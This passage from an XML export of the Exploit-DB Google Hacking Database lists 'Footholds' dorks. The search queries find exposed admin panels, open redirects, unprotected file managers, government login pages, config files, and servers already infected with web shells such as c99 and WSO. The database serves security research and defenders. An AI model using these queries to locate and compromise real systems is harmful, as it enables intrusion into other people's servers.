<querystring>https://www.google.com/search?q=intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED</querystring>
<edb></edb>
<date>2015-08-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4801</id>
<link>https://www.exploit-db.com/ghdb/4801</link>
<category>Footholds</category>
<shortDescription>intitle:Upload inurl:/cgi-bin/filechucker.cgi</shortDescription>
<textualDescription>AJAX-based web application / file manager - “filechucker” that lets you upload arbitary files on a website.
Author: Parth S. Patel
https://ca.linkedin.com/in/parthpateloscp
</textualDescription>
<query>intitle:Upload inurl:/cgi-bin/filechucker.cgi</query>
<querystring>https://www.google.com/search?q=intitle:Upload inurl:/cgi-bin/filechucker.cgi</querystring>
<edb></edb>
<date>2018-05-02</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>4925</id>
<link>https://www.exploit-db.com/ghdb/4925</link>
<category>Footholds</category>
<shortDescription>inurl: &quot;Mister Spy&quot; | intext:&quot;Mister Spy &amp; Souheyl Bypass Shell&quot;</shortDescription>
<textualDescription>inurl: &quot;Mister Spy&quot; | intext:&quot;Mister Spy &amp; Souheyl Bypass Shell&quot;
This Google Dork discovers servers infected with the &quot;Mister Spy&quot; web
shell.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>inurl: &quot;Mister Spy&quot; | intext:&quot;Mister Spy &amp; Souheyl Bypass Shell&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;Mister Spy&quot; | intext:&quot;Mister Spy &amp; Souheyl Bypass Shell&quot;</querystring>
<edb></edb>
<date>2018-08-17</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>6317</id>
<link>https://www.exploit-db.com/ghdb/6317</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;/arcgis/rest/services&quot;</shortDescription>
<textualDescription># Find Esri ArcGIS servers.
# Author: Tolga Kayaş
# Date: 18/06/2020
# Linkedin: https://www.linkedin.com/in/tolga-k/
</textualDescription>
<query>inurl:&quot;/arcgis/rest/services&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/arcgis/rest/services&quot;</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Tolga Kayaş</author>
</entry>
<entry>
<id>6319</id>
<link>https://www.exploit-db.com/ghdb/6319</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;/jmx-console/HtmlAdaptor?action&quot;</shortDescription>
<textualDescription>Dork: inurl:&quot;/jmx-console/HtmlAdaptor?action&quot;
Description: Sensitive data Exposure
---
Author: Krushna Lipane
</textualDescription>
<query>inurl:&quot;/jmx-console/HtmlAdaptor?action&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/jmx-console/HtmlAdaptor?action&quot;</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>krushna Lipane</author>
</entry>
<entry>
<id>6528</id>
<link>https://www.exploit-db.com/ghdb/6528</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;/plugins/servlet/Wallboard/&quot;</shortDescription>
<textualDescription>Google Dork : inurl:&quot;/plugins/servlet/Wallboard/&quot;
This will give all the Jira dashboard which might be vulnerable to XSS.
(Sensitive Data Exposure)
Author : Pratik Khalane
Date : 10/09/2020
</textualDescription>
<query>inurl:&quot;/plugins/servlet/Wallboard/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/plugins/servlet/Wallboard/&quot;</querystring>
<edb></edb>
<date>2020-09-10</date>
<author>Pratik Khalane</author>
</entry>
<entry>
<id>5096</id>
<link>https://www.exploit-db.com/ghdb/5096</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;/sidekiq/busy&quot;</shortDescription>
<textualDescription>*Google dork description: Get the sidekiq dashboard that is used to run
Ruby systems. You have the access to view, start, stop processes*
*Google Search:* inurl:&quot;/sidekiq/busy&quot;
*Submitted by:* Alfie
Website: (https://the-infosec.com)
</textualDescription>
<query>inurl:&quot;/sidekiq/busy&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/sidekiq/busy&quot;</querystring>
<edb></edb>
<date>2019-02-11</date>
<author>Alfie</author>
</entry>
<entry>
<id>4897</id>
<link>https://www.exploit-db.com/ghdb/4897</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;/tiny_mce/plugins/ajaxfilemanager/inc/data.php&quot; | inurl:&quot;/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php&quot; -github</shortDescription>
<textualDescription>finds tiny_mce vulnerable targets
--
*Regards*
*Ebaduddin Ahmad*
</textualDescription>
<query>inurl:&quot;/tiny_mce/plugins/ajaxfilemanager/inc/data.php&quot; | inurl:&quot;/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php&quot; -github</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/tiny_mce/plugins/ajaxfilemanager/inc/data.php&quot; | inurl:&quot;/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php&quot; -github</querystring>
<edb></edb>
<date>2018-08-02</date>
<author>Ebad uddin Ahmad</author>
</entry>
<entry>
<id>3744</id>
<link>https://www.exploit-db.com/ghdb/3744</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;amfphp/browser/servicebrowser.swf&quot;</shortDescription>
<textualDescription>AMFPHP service browser, debug interface. Author: syddd</textualDescription>
<query>inurl:&quot;amfphp/browser/servicebrowser.swf&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;amfphp/browser/servicebrowser.swf&quot;</querystring>
<edb></edb>
<date>2011-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>5208</id>
<link>https://www.exploit-db.com/ghdb/5208</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;cs.html?url=&quot;</shortDescription>
<textualDescription>Open Redirects.
D
</textualDescription>
<query>inurl:&quot;cs.html?url=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;cs.html?url=&quot;</querystring>
<edb></edb>
<date>2019-05-08</date>
<author>Dec0y</author>
</entry>
<entry>
<id>6241</id>
<link>https://www.exploit-db.com/ghdb/6241</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;customer.aspx&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;customer.aspx&quot;
# Title: Containing feedback Portal
# Date: 2020-06-07
# Author: Mahesh Rai
#LinkedIn: https://www.linkedin.com/in/mahesh-rai
#Bugcrowd: https://bugcrowd.com/Mahesh_Rai
</textualDescription>
<query>inurl:&quot;customer.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;customer.aspx&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Mahesh Rai</author>
</entry>
<entry>
<id>4480</id>
<link>https://www.exploit-db.com/ghdb/4480</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;go.cgi?url=&quot;</shortDescription>
<textualDescription>Finds pages which can be exploited to redirect to any site (You could use
this for phishing, etc.)
Dxtroyer</textualDescription>
<query>inurl:&quot;go.cgi?url=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;go.cgi?url=&quot;</querystring>
<edb></edb>
<date>2017-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4335</id>
<link>https://www.exploit-db.com/ghdb/4335</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;html/js/editor/ckeditor/&quot;</shortDescription>
<textualDescription>name =find liferay upload file
Google dork Description: inurl:&quot;html/js/editor/ckeditor/&quot;
Google search: inurl:&quot;html/js/editor/ckeditor/&quot;
Date: 2016-09-30
Author: sultan albalawi
Find file upload pages.
Summary: liferay upload file.</textualDescription>
<query>inurl:&quot;html/js/editor/ckeditor/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;html/js/editor/ckeditor/&quot;</querystring>
<edb></edb>
<date>2016-10-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>5655</id>
<link>https://www.exploit-db.com/ghdb/5655</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;index of&quot; wso</shortDescription>
<textualDescription>Dork:inurl:&quot;index of&quot; wso
Author:Santhosh Kumar Kuppan
Information: Access to WSO shell infected domains.
</textualDescription>
<query>inurl:&quot;index of&quot; wso</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index of&quot; wso</querystring>
<edb></edb>
<date>2019-11-22</date>
<author>Santhosh Kumar Kuppan</author>
</entry>
<entry>
<id>5536</id>
<link>https://www.exploit-db.com/ghdb/5536</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;index.php?db=&quot;</shortDescription>
<textualDescription>Google Dork: &quot;index.php?db=&quot;
Date: 09/14/2019
Exploit Author: th3d3xt3r
Category: Footholds
</textualDescription>
<query>inurl:&quot;index.php?db=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?db=&quot;</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>The Dexter</author>
</entry>
<entry>
<id>776</id>
<link>https://www.exploit-db.com/ghdb/776</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;phpOracleAdmin/php&quot; -download -cvs</shortDescription>
<textualDescription>phpOracleAdmin is intended to be a webbased Oracle Object Manager.In many points alike phpMyAdmin, it should offer more comfort and possibilities. Interestingly these managers are not password protected.</textualDescription>
<query>inurl:&quot;phpOracleAdmin/php&quot; -download -cvs</query>
<querystring>https://www.google.com/search?q=inurl%3A%22phpOracleAdmin%2Fphp%22+-download+-cvs</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>3816</id>
<link>https://www.exploit-db.com/ghdb/3816</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;r00t.php&quot;</shortDescription>
<textualDescription>This dork finds websites that were hacked, backdoored and contains their
system information e.g: Linux web.air51.ru 2.6.32-41-server #89-Ubuntu
SMP Fri Apr 27 22:33:31 UTC 2012 x86_64.
Jay Turla a.k.a shipcode
</textualDescription>
<query>Re: inurl:&quot;r00t.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;r00t.php&quot;</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1245</id>
<link>https://www.exploit-db.com/ghdb/1245</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;tmtrack.dll?&quot;</shortDescription>
<textualDescription>This query shows installations of Serena Teamtrack. (www.serena.com).You may be able to adjust the application entry point, by providing a command after the &quot;tmtrack.dll?&quot; like thistmtrack.dll?LoginPagetmtrack.dll?View&amp;Template=viewand more.</textualDescription>
<query>inurl:&quot;tmtrack.dll?&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22tmtrack.dll%3F%22&amp;hl=de&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2006-01-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5207</id>
<link>https://www.exploit-db.com/ghdb/5207</link>
<category>Footholds</category>
<shortDescription>inurl:&quot;urlstatusgo.html?url=&quot; -intext:&quot;Disallowed by URL filter&quot;</shortDescription>
<textualDescription>Open Redirects.
D
</textualDescription>
<query>inurl:&quot;urlstatusgo.html?url=&quot; -intext:&quot;Disallowed by URL filter&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;urlstatusgo.html?url=&quot; -intext:&quot;Disallowed by URL filter&quot;</querystring>
<edb></edb>
<date>2019-05-08</date>
<author>Dec0y</author>
</entry>
<entry>
<id>6511</id>
<link>https://www.exploit-db.com/ghdb/6511</link>
<category>Footholds</category>
<shortDescription>inurl:/Dashboard.xhtml intitle:&quot;Dashboard&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/Dashboard.xhtml intitle:&quot;Dashboard&quot;
# Various exposed dashboards.
# Date: 1/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/Dashboard.xhtml intitle:&quot;Dashboard&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/Dashboard.xhtml intitle:&quot;Dashboard&quot;</querystring>
<edb></edb>
<date>2020-09-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6287</id>
<link>https://www.exploit-db.com/ghdb/6287</link>
<category>Footholds</category>
<shortDescription>inurl:/download_file/ intext:&quot;index of /&quot;</shortDescription>
<textualDescription>inurl:/download_file/ intext:&quot;index of /&quot;
----
Regards,
Rishabh Chaplot
</textualDescription>
<query>inurl:/download_file/ intext:&quot;index of /&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/download_file/ intext:&quot;index of /&quot;</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Rishabh Chaplot</author>
</entry>
<entry>
<id>4679</id>
<link>https://www.exploit-db.com/ghdb/4679</link>
<category>Footholds</category>
<shortDescription>inurl:/install/stringnames.txt</shortDescription>
<textualDescription>inurl:/install/stringnames.txt
this DORK is useful to search moodle cms with install folder left on the hosted server
</textualDescription>
<query>inurl:/install/stringnames.txt</query>
<querystring>https://www.google.com/search?q=inurl:/install/stringnames.txt</querystring>
<edb></edb>
<date>2018-02-21</date>
<author>Nisankh Acharjya</author>
</entry>
<entry>
<id>5279</id>
<link>https://www.exploit-db.com/ghdb/5279</link>
<category>Footholds</category>
<shortDescription>inurl:/phpmyadmin/index.php?db=</shortDescription>
<textualDescription>inurl:/phpmyadmin/index.php?db=
phpmyadmin authenticated panel
ManhNho
</textualDescription>
<query>inurl:/phpmyadmin/index.php?db=</query>
<querystring>https://www.google.com/search?q=inurl:/phpmyadmin/index.php?db=</querystring>
<edb></edb>
<date>2019-07-15</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5136</id>
<link>https://www.exploit-db.com/ghdb/5136</link>
<category>Footholds</category>
<shortDescription>inurl:/phpMyAdmin/setup/index.php?phpMyAdmin=</shortDescription>
<textualDescription>Exploit : Access the Sensitive page of phpmyadmin
Google Dork : inurl:/phpMyAdmin/setup/index.php?phpMyAdmin=
Exploit Author:- Ehsan Nikavar
</textualDescription>
<query>inurl:/phpMyAdmin/setup/index.php?phpMyAdmin=</query>
<querystring>https://www.google.com/search?q=inurl:/phpMyAdmin/setup/index.php?phpMyAdmin=</querystring>
<edb></edb>
<date>2019-03-01</date>
<author>Ehsan Nikavar</author>
</entry>
<entry>
<id>6273</id>
<link>https://www.exploit-db.com/ghdb/6273</link>
<category>Footholds</category>
<shortDescription>inurl:/servicedesk/customer/user/login</shortDescription>
<textualDescription>Google Dork: inurl:/servicedesk/customer/user/login
Pages containing Login Portals
Author: Rutwik Shah
</textualDescription>
<query>inurl:/servicedesk/customer/user/login</query>
<querystring>https://www.google.com/search?q=inurl:/servicedesk/customer/user/login</querystring>
<edb></edb>
<date>2020-06-11</date>
<author>Rutwik Shah</author>
</entry>
<entry>
<id>4388</id>
<link>https://www.exploit-db.com/ghdb/4388</link>
<category>Footholds</category>
<shortDescription>inurl:/\\filesrc=**** ~&quot;Current&quot; ~&quot;:/&quot; ~&quot;upload&quot;</shortDescription>
<textualDescription>Extensive list of shell backdoors implimented on websites.
inurl:/\\filesrc=**** ~&quot;Current&quot; ~&quot;:/&quot; ~&quot;upload&quot; -codex -smashingmagazine
-'pub' -'public' -'mp3' -fossies -websvn -svn -git -login -.de -.fl -.ru
-.jp -.kr -.ch -.dk -dorks -google -Google -.gov -prevent -help -how -reset
-your -developer -reference -support -github
Anything with &quot;-&quot; in the beginning is used to help combat the fact that
google does not really want us to see all of the results. If we do not
filter through, google will mark us as a bot user and block our ip address.
The &quot;do not search&quot; expression is as important as the term or phrase we
wish to search and match for.
Thanks,
MrM</textualDescription>
<query>inurl:/\\filesrc=**** ~&quot;Current&quot; ~&quot;:/&quot; ~&quot;upload&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/\\filesrc=**** ~&quot;Current&quot; ~&quot;:/&quot; ~&quot;upload&quot;</querystring>
<edb></edb>
<date>2017-01-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>3867</id>
<link>https://www.exploit-db.com/ghdb/3867</link>
<category>Footholds</category>
<shortDescription>inurl:1337w0rm.php intitle:1337w0rm</shortDescription>
<textualDescription>Finds websites that have 1337w0rm's CPanel cracker uploaded.
Since the Cracker is relatively new, some sites might not use it.
-TehMysticaL
</textualDescription>
<query>inurl:1337w0rm.php intitle:1337w0rm</query>
<querystring>https://www.google.com/search?q=inurl:1337w0rm.php intitle:1337w0rm</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6503</id>
<link>https://www.exploit-db.com/ghdb/6503</link>
<category>Footholds</category>
<shortDescription>inurl::/app/kibana &quot;Kibana&quot; -discuss -ipaddress -git</shortDescription>
<textualDescription># Google Dork: inurl::/app/kibana &quot;Kibana&quot; -discuss -ipaddress -git
# Kibana Visualization Dashboards
# Date: 31/08/2020
# Exploit Author: Adithya Chandra
Thanks and Best Regards,
Adithya Chandra
</textualDescription>
<query>inurl::/app/kibana &quot;Kibana&quot; -discuss -ipaddress -git</query>
<querystring>https://www.google.com/search?q=inurl::/app/kibana &quot;Kibana&quot; -discuss -ipaddress -git</querystring>
<edb></edb>
<date>2020-08-31</date>
<author>Adithya Chandra</author>
</entry>
<entry>
<id>4403</id>
<link>https://www.exploit-db.com/ghdb/4403</link>
<category>Footholds</category>
<shortDescription>inurl:?filesrc=**** ~&quot;Current&quot; ~&quot;asp&quot;</shortDescription>
<textualDescription>Also here are more different uploaded shell names.
inurl:&quot;?filesrc=//&quot; &quot;Upload&quot; ~admin
-Xploit </textualDescription>
<query>inurl:?filesrc=**** ~&quot;Current&quot; ~&quot;asp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:?filesrc=**** ~&quot;Current&quot; ~&quot;asp&quot;</querystring>
<edb></edb>
<date>2017-03-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>7839</id>
<link>https://www.exploit-db.com/ghdb/7839</link>
<category>Footholds</category>
<shortDescription>inurl:adminpanel site:gov.*</shortDescription>
<textualDescription># Description : inurl:adminpanel site:gov.*
# This google dork indexes pages containing Admin Login Panels of government
# sites where an attacker can login and bypass restrictions if not configured
# properly.
# Author : Asheet Tirkey
# Date : 11th Jan 2022
</textualDescription>
<query>inurl:adminpanel site:gov.*</query>
<querystring>https://www.google.com/search?q=inurl:adminpanel site:gov.*</querystring>
<edb></edb>
<date>2022-01-12</date>
<author>Asheet Tirkey</author>
</entry>
<entry>
<id>651</id>
<link>https://www.exploit-db.com/ghdb/651</link>
<category>Footholds</category>
<shortDescription>inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx</shortDescription>
<textualDescription>Windows Small Business Server 2003: The network configuration page is called &quot;ConnectComputer/precheck.htm &quot; and the Remote Web login page is called &quot;remote/logon.aspx&quot;.</textualDescription>
<query>inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx</query>
<querystring>https://www.google.com/search?q=inurl%3AConnectComputer%2Fprecheck.htm+%7C+inurl%3ARemote%2Flogon.aspx</querystring>
<edb></edb>
<date>2004-11-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>6497</id>
<link>https://www.exploit-db.com/ghdb/6497</link>
<category>Footholds</category>
<shortDescription>inurl:CTCWebService</shortDescription>
<textualDescription># Google Dork: inurl:CTCWebService
# Date: 8/24/2020
# Exploit Author: Javier Bernardo
# Homepage: www.hack.com.ar
Javier Bernardo
*Information Security Analyst Ethical Hacker*
Aires - Argentina
</textualDescription>
<query>inurl:CTCWebService</query>
<querystring>https://www.google.com/search?q=inurl:CTCWebService</querystring>
<edb></edb>
<date>2020-08-27</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6305</id>
<link>https://www.exploit-db.com/ghdb/6305</link>
<category>Footholds</category>
<shortDescription>inurl:logon/LogonPoint/index.html</shortDescription>
<textualDescription>Dork: inurl:logon/LogonPoint/index.html
Description: Find Citrix Gateway Portals that might be potentially
vulnerable to CVE-2019-19781.
Author - Harsh Bothra
Twitter - https://www.twitter.com/harshbothra_
</textualDescription>
<query>inurl:logon/LogonPoint/index.html</query>
<querystring>https://www.google.com/search?q=inurl:logon/LogonPoint/index.html</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Harsh Bothra</author>
</entry>
<entry>
<id>7322</id>
<link>https://www.exploit-db.com/ghdb/7322</link>
<category>Footholds</category>
<shortDescription>inurl:maps.arcgis.com +&quot;City of&quot;</shortDescription>
<textualDescription># Google Dork: inurl:maps.arcgis.com +&quot;City of&quot;
# Footholds
# Date: 22/09/21
# Exploit Author: Edmond Major
</textualDescription>
<query>inurl:maps.arcgis.com +&quot;City of&quot;</query>
<querystring>https://www.google.com/search?q=inurl:maps.arcgis.com +&quot;City of&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Edmond Major</author>
</entry>
<entry>
<id>1163</id>
<link>https://www.exploit-db.com/ghdb/1163</link>
<category>Footholds</category>
<shortDescription>inurl:polly/CP</shortDescription>
<textualDescription>You can get into admin panel without logging.</textualDescription>
<query>inurl:polly/CP</query>
<querystring>https://www.google.com/search?complete=1&amp;q=inurl%3Apolly%2FCP</querystring>
<edb></edb>
<date>2005-10-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4183</id>
<link>https://www.exploit-db.com/ghdb/4183</link>
<category>Footholds</category>
<shortDescription>inurl:revslider inurl:temp inurl:update_extract inurl:sym1</shortDescription>
<textualDescription>Symlinks to files using the revslider vulnerability.
--
Stephen Haywood
Owner: ASG Consulting
averagesecurityguy.info</textualDescription>
<query>inurl:revslider inurl:temp inurl:update_extract inurl:sym1</query>
<querystring>https://www.google.com/search?q=inurl:revslider inurl:temp inurl:update_extract inurl:sym1</querystring>
<edb></edb>
<date>2016-01-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4079</id>
<link>https://www.exploit-db.com/ghdb/4079</link>
<category>Footholds</category>
<shortDescription>inurl:sh3llZ/c99/</shortDescription>
<textualDescription>Through this shell you can find c99 shells uploaded on websites. inurl:sh3llZ/c99/
</textualDescription>
<query>inurl:sh3llZ/c99/</query>
<querystring>https://www.google.com/search?q=inurl:sh3llZ/c99/</querystring>
<edb></edb>
<date>2015-09-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5183</id>
<link>https://www.exploit-db.com/ghdb/5183</link>
<category>Footholds</category>
<shortDescription>inurl:wp-login.php?action=register</shortDescription>
<textualDescription>Wordpress sites with registration enabled.
</textualDescription>
<query>inurl:wp-login.php?action=register</query>
<querystring>https://www.google.com/search?q=inurl:wp-login.php?action=register</querystring>
<edb></edb>
<date>2019-04-15</date>
<author>Randsec</author>
</entry>
<entry>
<id>6536</id>
<link>https://www.exploit-db.com/ghdb/6536</link>
<category>Footholds</category>
<shortDescription>inurl:wsnavigator/jsps</shortDescription>
<textualDescription># Google Dork: inurl:wsnavigator/jsps
# Date: 9/11/2020
# Exploit Author: Javier Bernardo
# Homepage:
[www.hack.com.ar](http://www.hack.com.ar/)
Javier Bernardo
Information Security Analyst Ethical Hacker
Mobile: +54 9 11 6219 0141 |[Email:javierbernardo001@gmail.com](mailto:Email%3Ajavierbernardo001@gmail.com) | Buenos Aires - Argentina
Sent with [ProtonMail](https://protonmail.com) Secure Email.</textualDescription>
<query>inurl:wsnavigator/jsps</query>
<querystring>https://www.google.com/search?q=inurl:wsnavigator/jsps</querystring>
<edb></edb>
<date>2020-09-14</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6531</id>
<link>https://www.exploit-db.com/ghdb/6531</link>
<category>Footholds</category>
<shortDescription>mail/u/0 filetype:pdf</shortDescription>
<textualDescription>Google Dork: mail/u/0 filetype:pdf
Description: Pages Exposing internal Documents
Date: 11/09/2020
Thanks &amp; Regards
AjithKumar K
</textualDescription>
<query>mail/u/0 filetype:pdf</query>
<querystring>https://www.google.com/search?q=mail/u/0 filetype:pdf</querystring>
<edb></edb>
<date>2020-09-11</date>
<author>AjithKumar</author>
</entry>
<entry>
<id>4366</id>
<link>https://www.exploit-db.com/ghdb/4366</link>
<category>Footholds</category>
<shortDescription>Meg4-Mail ext:php</shortDescription>
<textualDescription>Google Dork: Meg4-Mail ext:php
PHP MAILER
NO SPAM PLEASE ..
Goolge Dork by INILERM</textualDescription>
<query>Meg4-Mail ext:php</query>
<querystring>https://www.google.com/search?q=Meg4-Mail ext:php</querystring>
<edb></edb>
<date>2016-11-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>327</id>
<link>https://www.exploit-db.com/ghdb/327</link>
<category>Footholds</category>
<shortDescription>PHP Shell (unprotected)</shortDescription>
<textualDescription>PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbiritary shell-commands or browse the filesystem on your remote Web server. This replaces, to a degree, a normal telnet-connection. You can use it for administration and maintenance of your Web site using commands like ps, free, du, df, and more.If these shells aren't protected by some form of authentication, an attacker will basicly *own* the server. This search finds such unprotected phpshells by looking for the keyword &quot;enable stderr&quot;.</textualDescription>
<query>intitle:&quot;PHP Shell *&quot; &quot;Enable stderr&quot; filetype:php</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22PHP+Shell+*%22+%22Enable+stderr%22+filetype%3Aphp</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>725</id>
<link>https://www.exploit-db.com/ghdb/725</link>
<category>Footholds</category>
<shortDescription>PHPKonsole PHPShell filetype:php -echo</shortDescription>
<textualDescription>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you...</textualDescription>
<query>PHPKonsole PHPShell filetype:php -echo</query>
<querystring>https://www.google.com/search?q=PHPKonsole+PHPShell++filetype%3Aphp+-echo</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>323</id>
<link>https://www.exploit-db.com/ghdb/323</link>
<category>Footholds</category>
<shortDescription>Public PHP FileManagers</shortDescription>
<textualDescription>PHPFM is an open source file manager written in PHP. It is easy to set up for a beginner, but still easy to customize for the more experienced user. The built-in login system makes sure that only people with the right username and password gains access to PHPFM, however, you can also choose to disable the login system and use PHPFM for public access. It can currently: create, rename and delete folders; create, upload, rename, download and delete files; edit text files; view image files; sort files by name, size, permissions and last modification date both ascending and descending; communicate in more languages. This search finds those &quot;public&quot; versions of PHPFM. An attacker can use them to manage his own files (phpshell anyone ?).PS: thanks to j0hnny for the public access angle :)</textualDescription>
<query>&quot;Powered by PHPFM&quot; filetype:php -username</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Powered+by+PHPFM%22+filetype%3Aphp+-username</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>5556</id>
<link>https://www.exploit-db.com/ghdb/5556</link>
<category>Footholds</category>
<shortDescription>site:*/wp-admin/install.php intitle:WordPress Installation</shortDescription>
<textualDescription>Files Containing Juicy Info:
site:*/wp-admin/install.php intitle:WordPress Installation
Reza Abasi(Turku)
</textualDescription>
<query>site:*/wp-admin/install.php intitle:WordPress Installation</query>
<querystring>https://www.google.com/search?q=site:*/wp-admin/install.php intitle:WordPress Installation</querystring>
<edb></edb>
<date>2019-09-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5739</id>
<link>https://www.exploit-db.com/ghdb/5739</link>
<category>Footholds</category>
<shortDescription>site:bamboo.*.* ext:action build</shortDescription>
<textualDescription>find misconfigured and open bamboo instances
ex16x41
</textualDescription>
<query>site:bamboo.*.* ext:action build</query>
<querystring>https://www.google.com/search?q=site:bamboo.*.* ext:action build</querystring>
<edb></edb>
<date>2020-02-18</date>
<author>ex16x41</author>
</entry>
<entry>
<id>6240</id>
<link>https://www.exploit-db.com/ghdb/6240</link>
<category>Footholds</category>
<shortDescription>site:linkedin.com employees target.com</shortDescription>
<textualDescription>*Dork: *site:linkedin.com employees target.com
*Description:* This google dork will list all the employees of a particular
organisation who are there on linkedin.
*Author:* Shamika Shewale
</textualDescription>
<query>site:linkedin.com employees target.com</query>
<querystring>https://www.google.com/search?q=site:linkedin.com employees target.com</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Shamika Shewale</author>
</entry>
<entry>
<id>4713</id>
<link>https://www.exploit-db.com/ghdb/4713</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;:: Arachni Web Application Security Report&quot;</shortDescription>
<textualDescription>&quot;:: Arachni Web Application Security Report&quot;
Finds reports left behind by Arachini (web vulnerability scanner)
ManhNho
</textualDescription>
<query>&quot;:: Arachni Web Application Security Report&quot;</query>
<querystring>https://www.google.com/search?q=&quot;:: Arachni Web Application Security Report&quot;</querystring>
<edb></edb>
<date>2018-03-27</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4919</id>
<link>https://www.exploit-db.com/ghdb/4919</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;ansible.log&quot; | &quot;playbook.yaml&quot; | &quot;.ansible.cfg&quot; | &quot;playbook.yml&quot; | host.ini intitle:&quot;index of&quot;</shortDescription>
<textualDescription>Target's system configuration, networks, etc...
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;ansible.log&quot; | &quot;playbook.yaml&quot; | &quot;.ansible.cfg&quot; | &quot;playbook.yml&quot; | host.ini intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=&quot;ansible.log&quot; | &quot;playbook.yaml&quot; | &quot;.ansible.cfg&quot; | &quot;playbook.yml&quot; | host.ini intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2018-08-14</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>393</id>
<link>https://www.exploit-db.com/ghdb/393</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;apricot - admin&quot; 00h</shortDescription>
